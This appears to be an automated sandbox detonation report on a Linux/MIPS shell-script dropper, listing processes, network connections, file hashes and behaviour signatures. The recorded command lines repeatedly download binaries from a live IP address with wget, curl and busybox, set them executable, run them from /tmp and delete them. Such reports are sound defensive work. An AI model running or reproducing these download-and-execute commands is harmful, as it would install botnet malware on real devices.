[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]
/usr/bin/wget
[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/chmod
[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj
[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/bin/rm
[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]
/usr/bin/wget
[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/chmod
[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/rm
[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/wget
[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/chmod
[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO
[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/rm
[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/wget
[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/chmod
[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S
[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/rm
[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/wget
[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/chmod
[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME
[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/rm
[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/wget
[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/chmod
[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV
[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/rm
[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/wget
[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/chmod
[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH
[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/rm
[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/wget
[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/chmod
[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal
[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/bin/rm
[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]
/usr/bin/wget
[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/chmod
[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V
[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/bin/rm
[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]
/usr/bin/wget
[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/chmod
[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS
[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
/bin/rm
[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]
Network
| Country | Destination | Domain | Proto |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
| DE | 87.120.84.230:80 | 87.120.84.230 | tcp |
Files
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:26
Reported
2024-10-25 01:29
Platform
debian9-mipsel-20240418-en
Max time kernel
71s
Max time network
72s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | N/A |
| N/A | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | N/A |
| N/A | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | N/A |
| N/A | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | N/A |
| N/A | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | N/A |
| N/A | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | N/A |
| N/A | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | N/A |
| N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
| N/A | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | N/A |
| N/A | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | N/A |
| N/A | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | N/A |
| N/A | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | N/A |
| N/A | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | N/A |
| N/A | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | N/A |
| N/A | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | N/A |
| N/A | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | N/A |
| N/A | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | N/A |
| N/A | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | N/A |
| N/A | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | N/A |
| N/A | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | N/A |
| N/A | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | N/A |
| N/A | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | N/A |
| N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | N/A | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V | /usr/bin/curl | N/A |
Processes
/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh
[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/chmod
[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z
[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/bin/rm
[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]
/usr/bin/wget
[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/chmod
[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO
[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/bin/rm
[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]
/usr/bin/wget
[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/chmod
[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S
[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/bin/rm
[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]
/usr/bin/wget
[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/chmod
[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME
[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/bin/rm
[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]
/usr/bin/wget
[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/busybox
[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/chmod
[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV
[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/bin/rm
[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]
/usr/bin/wget
[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/usr/bin/curl
[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]
/bin/busybox
